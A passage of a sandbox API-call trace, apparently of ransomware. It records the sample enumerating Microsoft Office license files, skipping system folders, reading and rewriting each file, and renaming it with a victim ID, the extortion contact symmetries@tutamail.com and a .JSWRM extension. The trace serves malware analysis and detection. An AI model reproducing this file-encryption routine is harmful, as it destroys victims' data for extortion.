lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0110.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0110.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0110.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0110.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.181] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_mak-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_MAK-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_mak-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0110.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0110.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0110.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0110.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.182] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb227c5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb227c5a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb30ca82, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessVL_MAK-ppd.xrm-ms", cAlternateFileName="SK1300~1.XRM")) returned 1 [0110.182] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ppd.xrm-ms", lpString2=".") returned 1 [0110.182] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ppd.xrm-ms", lpString2="..") returned 1 [0110.182] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ppd.xrm-ms", lpString2="...") returned 1 [0110.182] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ppd.xrm-ms", lpString2="windows") returned -1 [0110.182] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ppd.xrm-ms", lpString2="recovery") returned 1 [0110.182] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ppd.xrm-ms", lpString2="perflogs") returned 1 [0110.182] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0110.182] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.182] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ppd.xrm-ms", lpString2="system volume information") returned -1 [0110.182] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ppd.xrm-ms", lpString2="msocache") returned 1 [0110.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0110.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_MAK-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0110.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_MAK-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0110.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0110.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0110.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_MAK-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0110.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0110.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_MAK-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d298, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0110.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0110.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0110.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0110.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0110.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_mak-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.183] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6752) returned 1 [0110.183] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a60) returned 0x205850 [0110.183] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a60, lpOverlapped=0x0) returned 1 [0110.185] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.185] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a60, lpOverlapped=0x0) returned 1 [0110.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0110.185] CloseHandle (hObject=0x45c) returned 1 [0110.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0110.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0110.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0110.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0110.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0110.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0110.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.186] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_mak-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_MAK-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_mak-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0110.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0110.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0110.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0110.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.187] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb522b88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb522b88, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb5bb4cb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", cAlternateFileName="SK74BC~1.XRM")) returned 1 [0110.187] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", lpString2=".") returned 1 [0110.187] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", lpString2="..") returned 1 [0110.187] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", lpString2="...") returned 1 [0110.187] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", lpString2="windows") returned -1 [0110.187] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0110.187] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0110.187] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0110.187] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.187] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0110.187] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0110.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0110.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0110.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0110.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0110.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0110.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0110.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0110.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0110.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0110.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0110.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0110.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_mak-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.188] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11631) returned 1 [0110.188] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0110.188] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0110.190] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.190] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0110.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.190] CloseHandle (hObject=0x45c) returned 1 [0110.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0110.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0110.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0110.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0110.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0110.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0110.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.191] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_mak-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_MAK-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_mak-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0110.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0110.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0110.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.192] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb712a03, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb712a03, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb7f782f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4e08, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", cAlternateFileName="SK9858~1.XRM")) returned 1 [0110.192] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", lpString2=".") returned 1 [0110.192] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", lpString2="..") returned 1 [0110.192] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", lpString2="...") returned 1 [0110.192] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", lpString2="windows") returned -1 [0110.192] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", lpString2="recovery") returned 1 [0110.192] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0110.192] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0110.192] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.192] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0110.192] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0110.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0110.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0110.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0110.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0110.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0110.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0110.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0110.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0110.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0110.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0110.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0110.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_mak-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.193] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19976) returned 1 [0110.193] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e00) returned 0x24c1d0 [0110.193] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4e00, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4e00, lpOverlapped=0x0) returned 1 [0110.196] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.196] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4e00, lpOverlapped=0x0) 